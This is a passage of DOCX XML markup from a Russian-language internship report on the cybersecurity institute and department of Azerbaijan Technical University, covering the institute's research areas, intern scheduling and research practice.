                <w:rStyle w:val="a7"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="005759DA" w:rsidRPr="00F342C5">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D41A28">
              <w:rPr>
                <w:webHidden/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3B21638D" w14:textId="220D1E98" w:rsidR="005759DA" w:rsidRPr="00F342C5" w:rsidRDefault="001B2A34" w:rsidP="0004332E">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc161761587" w:history="1">
            <w:r w:rsidR="005759DA" w:rsidRPr="00F342C5">
              <w:rPr>
                <w:rStyle w:val="a7"/>
              </w:rPr>
              <w:t xml:space="preserve">5.6 </w:t>
            </w:r>
            <w:r w:rsidR="00F342C5" w:rsidRPr="00F342C5">
              <w:rPr>
                <w:lang w:val="az-Cyrl-AZ"/>
              </w:rPr>
              <w:t>Программное моделирование атак на примере DDoS</w:t>
            </w:r>
            <w:r w:rsidR="005759DA" w:rsidRPr="00F342C5">
              <w:rPr>
                <w:rStyle w:val="a7"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="005759DA" w:rsidRPr="00F342C5">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D41A28">
              <w:rPr>
                <w:webHidden/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0AF4DA63" w14:textId="7AD7FD78" w:rsidR="005759DA" w:rsidRPr="008E35E4" w:rsidRDefault="001B2A34" w:rsidP="0004332E">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc161761588" w:history="1">
            <w:r w:rsidR="003B2F93">
              <w:rPr>
                <w:rStyle w:val="a7"/>
              </w:rPr>
              <w:t>ВЫВОД</w:t>
            </w:r>
            <w:r w:rsidR="005759DA" w:rsidRPr="008E35E4">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D41A28">
              <w:rPr>
                <w:webHidden/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6E6ACA59" w14:textId="3C796D65" w:rsidR="005759DA" w:rsidRDefault="001B2A34" w:rsidP="0004332E">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc161761589" w:history="1">
            <w:r w:rsidR="003B2F93">
              <w:rPr>
                <w:rStyle w:val="a7"/>
              </w:rPr>
              <w:t>ЛИТЕРАТУРА</w:t>
            </w:r>
            <w:r w:rsidR="005759DA" w:rsidRPr="008E35E4">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D41A28">
              <w:rPr>
                <w:webHidden/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0D506924" w14:textId="77777777" w:rsidR="00B53312" w:rsidRDefault="00F674E3" w:rsidP="00B53312">
          <w:pPr>
            <w:rPr>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:lastRenderedPageBreak/>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:bookmarkStart w:id="2" w:name="_Hlk161758611" w:displacedByCustomXml="prev"/>
    <w:p w14:paraId="216F236F" w14:textId="053CECAD" w:rsidR="00BE2B61" w:rsidRPr="00B53312" w:rsidRDefault="0084561D" w:rsidP="00520A08">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="57"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B53312">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Введение</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="2"/>
    <w:p w14:paraId="05F4E7A9" w14:textId="77777777" w:rsidR="005F1B9E" w:rsidRDefault="005F1B9E" w:rsidP="00520A08">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="sq-AL" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F1B9E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="sq-AL" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Институт киберфизических систем и кибербезопасности, работающий в составе Азербайджанского технического университета (АзТУ), занимается исследованиями в области киберфизических систем и кибербезопасности в связи с развитием современных технологий. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC5800E" w14:textId="77777777" w:rsidR="005F1B9E" w:rsidRDefault="005F1B9E" w:rsidP="00520A08">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="sq-AL" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F1B9E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="sq-AL" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Киберфизические системы — это сложные системы, которые интегрируют информационно-коммуникационные технологии для управления и мониторинга физических процессов. Безопасность этих систем имеет важное значение для устойчивости национальной критической инфраструктуры, включая такие отрасли, как промышленность, энергетика, водоснабжение, транспорт и другие. Институт также проводит исследования в области применения технологий искусственного интеллекта в киберфизических системах. Эти исследования охватывают использование алгоритмов искусственного интеллекта для обнаружения, предотвращения и прогнозирования угроз безопасности. Кроме того, институт занимается исследованием проблем безопасности сенсорных сетей в киберфизических системах. Эти исследования направлены на разработку методов решения проблем кибербезопасности в сенсорных сетях. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C65F9E1" w14:textId="77777777" w:rsidR="005F1B9E" w:rsidRDefault="005F1B9E" w:rsidP="00520A08">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="sq-AL" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F1B9E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="sq-AL" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Деятельность института направлена на увеличение научных знаний в области киберфизических систем и кибербезопасности, разработку и внедрение новых технологий, а также подготовку высококвалифицированных специалистов. Основные цели и направления деятельности Института Институт киберфизических систем и кибербезопасности (И КФС и КБ) является важным научно-исследовательским учреждением в составе АзТУ. Основной целью института является проведение научных исследований в области киберфизических систем и кибербезопасности, разработка новых технологий и подготовка специалистов в этой области. Институт проводит исследования в таких областях, как безопасность киберфизических систем, применение технологий искусственного интеллекта и проблемы безопасности сенсорных сетей. Эти исследования направлены на обеспечение устойчивости национальной критической инфраструктуры и разработку инновационных решений в области кибербезопасности. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAD6DA3" w14:textId="77777777" w:rsidR="005F1B9E" w:rsidRDefault="005F1B9E" w:rsidP="00520A08">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="sq-AL" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F1B9E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="sq-AL" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Институт также участвует в международных научных сотрудничествах и проектах, с целью внесения вклада в решение глобальных проблем кибербезопасности. Эта деятельность способствует укреплению позиций Азербайджана в области кибербезопасности и подготовке специалистов, соответствующих международным стандартам. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E02FA00" w14:textId="77777777" w:rsidR="005F1B9E" w:rsidRDefault="005F1B9E" w:rsidP="00520A08">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="sq-AL" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F1B9E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="sq-AL" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Киберфизические системы и их значение </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C7A877" w14:textId="77777777" w:rsidR="005F1B9E" w:rsidRDefault="005F1B9E" w:rsidP="00520A08">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="sq-AL" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F1B9E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="sq-AL" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Киберфизические системы (КФС) — это сложные структуры, которые соединяют цифровые и аналоговые устройства, интерфейсы, сети и компьютерные системы с физическим </w:t>
      </w:r>
      <w:r w:rsidRPr="005F1B9E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="sq-AL" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">миром. Эти системы основаны на компьютерных системах, которые обрабатывают информацию и выполняют специальные задачи в таких отраслях, как автомобилистроение, авиация, энергетика и других. КФС эффективно интегрируют кибернетические и физические компоненты, используя современные технологии сенсоров, вычислений и сетей. Направления исследований института И КФС и КБ проводит исследования по следующим основным направлениям: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63361C8D" w14:textId="77777777" w:rsidR="005F1B9E" w:rsidRDefault="005F1B9E" w:rsidP="00520A08">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="sq-AL" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F1B9E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="sq-AL" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Применение технологий искусственного интеллекта: Искусственный интеллект помогает быстро обнаруживать киберугрозы и находить автоматические решения для повышения безопасности системы. Институт проводит исследования применения технологий искусственного интеллекта в области безопасности киберфизических систем. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41077D7F" w14:textId="77777777" w:rsidR="005F1B9E" w:rsidRDefault="005F1B9E" w:rsidP="00520A08">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="sq-AL" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F1B9E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="sq-AL" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Безопасность сенсорных сетей: Сенсорные сети, являющиеся важным компонентом КФС, также являются объектом исследований института. Эти исследования направлены на разработку методов решения проблем кибербезопасности в сенсорных сетях. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDE18E8" w14:textId="77777777" w:rsidR="005F1B9E" w:rsidRDefault="005F1B9E" w:rsidP="00520A08">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="sq-AL" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F1B9E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="sq-AL" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Применение технологий Fog Computing: Институт также проводит исследования применения технологий Fog Computing и анализа проблем кибербезопасности в киберфизических системах. Fog Computing — это модель вычислений, которая выполняет обработку данных и реализацию приложений на периферии сети, на вычислительных узлах. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A589E0F" w14:textId="77777777" w:rsidR="005F1B9E" w:rsidRDefault="005F1B9E" w:rsidP="00520A08">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="sq-AL" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F1B9E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="sq-AL" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Международное сотрудничество и тренинги </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8A2738" w14:textId="626E3E4B" w:rsidR="004D386F" w:rsidRPr="007C0217" w:rsidRDefault="005F1B9E" w:rsidP="00520A08">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F1B9E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="sq-AL" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Институт участвует в международных научных сотрудничествах и проектах, с целью внесения вклада в решение глобальных проблем кибербезопасности. Например, Министерство цифрового развития и транспорта Азербайджанской Республики совместно с Израильским институтом "Technion" создало Центр кибербезопасности Азербайджана. В течение трех лет планируется провести кибербезопасностные тренинги для более 1000 человек в Азербайджане. Деятельность института направлена на увеличение научных знаний в области киберфизических систем и кибербезопасности, разработку и внедрение новых технологий, а также подготовку специалистов в данной области.</w:t>
      </w:r>
      <w:r w:rsidR="004D386F">
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA1B5B4" w14:textId="3B6ACFE5" w:rsidR="00043BFF" w:rsidRDefault="009A3671" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc161761558"/>
      <w:r w:rsidRPr="009A3671">
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">ГЛАВА </w:t>
      </w:r>
      <w:r w:rsidR="001C6DA3" w:rsidRPr="00E11774">
        <w:rPr>
          <w:color w:val="202122"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F9FA"/>
          <w:lang w:val="af-ZA"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="00043BFF" w:rsidRPr="00E11774">
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="005759DA">
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidRPr="009A3671">
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ОБЩЕЕ ЗНАКОМСТВО СО СТРУКТУРОЙ КАФЕДРЫ КИБЕРБЕЗОПАСНОСТИ АЗЕРБАЙДЖАНСКОГО ТЕХНИЧЕСКОГО УНИВЕРСИТЕТА</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB65F3C" w14:textId="77777777" w:rsidR="00E7264E" w:rsidRPr="00E7264E" w:rsidRDefault="00E7264E" w:rsidP="00520A08">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CFFCEDD" w14:textId="21C95808" w:rsidR="009A3671" w:rsidRPr="009A3671" w:rsidRDefault="009A3671" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Составление рабочего графика практиканта</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F000767" w14:textId="77777777" w:rsidR="009A3671" w:rsidRDefault="009A3671" w:rsidP="00520A08">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A3671">
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Правильное составление рабочего графика стажеров играет важную роль в их обучении и профессиональном развитии. Этот процесс способствует лучшей адаптации стажеров к рабочей среде, более эффективному усвоению инструкций, а также повышению их мотивации и морального состояния. При составлении рабочего графика необходимо учитывать следующие ключевые моменты: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3B1482" w14:textId="1A920615" w:rsidR="009A3671" w:rsidRDefault="009A3671" w:rsidP="00520A08">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A3671">
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Интеграция инструктажей и стажировки: Задачи, поставленные перед стажерами, должны позволять им применять теоретические знания на практике. Это поможет развить их профессиональные навыки и усилит процесс обучения в реальной рабочей среде. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A03F06" w14:textId="75112165" w:rsidR="009A3671" w:rsidRDefault="009A3671" w:rsidP="00520A08">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A3671">
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Ориентация на различные задачи: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>практикантов</w:t>
      </w:r>
      <w:r w:rsidRPr="009A3671">
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> следует поощрять к работе в разных областях и на различных должностях. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F57B7CA" w14:textId="77777777" w:rsidR="009A3671" w:rsidRDefault="009A3671" w:rsidP="00520A08">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A3671">
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Это расширит их навыки и поможет разнообразить их интересы и опыт. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322909DF" w14:textId="77777777" w:rsidR="009A3671" w:rsidRDefault="009A3671" w:rsidP="00520A08">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A3671">
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Консультации и поддержка: Важно иметь систему поддержки и консультирования для стажеров. Назначенные наставники или руководители должны быть готовы отвечать на вопросы, предоставлять необходимые инструкции и давать советы по развитию карьеры. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165FC555" w14:textId="333277C2" w:rsidR="009A3671" w:rsidRDefault="009A3671" w:rsidP="00520A08">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A3671">
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Оценка: Процесс адаптации и развития стажеров должен регулярно оцениваться, а стажерам необходимо предоставлять обратную связь. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50772087" w14:textId="21F8E49B" w:rsidR="009A3671" w:rsidRDefault="009A3671" w:rsidP="00520A08">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A3671">
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Это создаст мотивацию для самосовершенствования и дальнейшего развития профессиональных навыков. Правильно составленный рабочий график для стажеров позволяет им быть более эффективными и продуктивными в рамках организации, а также помогает им делать уверенные шаги к своим карьерным целям. Этот процесс вносит вклад в успех как самих стажеров, так и предприятия в целом.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6466C561" w14:textId="77777777" w:rsidR="00A4455C" w:rsidRDefault="00A4455C" w:rsidP="00520A08">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36BEF371" w14:textId="6BC909C6" w:rsidR="00A4455C" w:rsidRPr="00A4455C" w:rsidRDefault="00A4455C" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>З</w:t>
      </w:r>
      <w:r w:rsidRPr="00A4455C">
        <w:rPr>
          <w:lang w:val="sq-AL"/>
        </w:rPr>
        <w:t xml:space="preserve">накомство с научно-исследовательским </w:t>
      </w:r>
      <w:r>
        <w:t>опытом</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7217285A" w14:textId="77777777" w:rsidR="00232EB6" w:rsidRDefault="00A4455C" w:rsidP="00520A08">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A4455C">
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Научно-исследовательская практика является важной частью академического и профессионального развития. Эта практика предоставляет студентам и специалистам возможность применить теоретические знания на практике, получить новые данные, решать проблемы и тестировать инновационные идеи. Через научно-исследовательскую практику практиканты развивают навыки самостоятельного мышления, критического анализа, сбора и анализа данных, а также представления результатов. Значение научно-исследовательской </w:t>
      </w:r>
      <w:r w:rsidRPr="00A4455C">
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">практики крайне важно для применения теоретических знаний. Для студентов и молодых исследователей увидеть, как теоретические знания применяются на практике, дает возможность использовать их для решения современных проблем. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6A89C0" w14:textId="4B43328F" w:rsidR="00A4455C" w:rsidRDefault="00A4455C" w:rsidP="00520A08">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A4455C">
        <w:rPr>
          <w:lang w:val="af-ZA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Научно-исследовательская практика укрепляет навыки самостоятельных исследований. Здесь развиваются такие умения, как исследовательская методология, сбор и анализ данных, а также написание научных работ. Новые идеи и подходы дают исследователям возможность исследовать новые концепции в своей области и предлагать инновации, что способствует развитию науки и технологий. Во время научно-исследовательской практики важно принимать участие в исследовательских проектах в академических учреждениях, сотрудничать с преподавателями и профессорами. Важно также участвовать в научных мероприятиях, представлять результаты исследований и быть в курсе новых достижений в своей области. Практиканты должны поддерживать регулярный контакт с преподавателями и наставниками, извлекая пользу из их знаний и опыта. Также крайне важно развивать критическое мышление и способность работать самостоятельно, чтобы исследовать новые идеи и отвечать на возникающие вопросы. Процесс научных исследований может быть сложным и длительным. Для того чтобы найти оптимальные результаты, необходимо проявлять терпение и продолжать работать на протяжении всего исследования. Научно-исследовательская практика является ценным шансом для личного и профессионального развития. Полученные знания, навыки и опыт в дальнейшем дадут преимущества как в академической сфере, так и в повседневной жизни.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF78079" w14:textId="77777777" w:rsidR="003E29CA" w:rsidRDefault="003E29CA" w:rsidP="00520A08">
      <w:pPr>
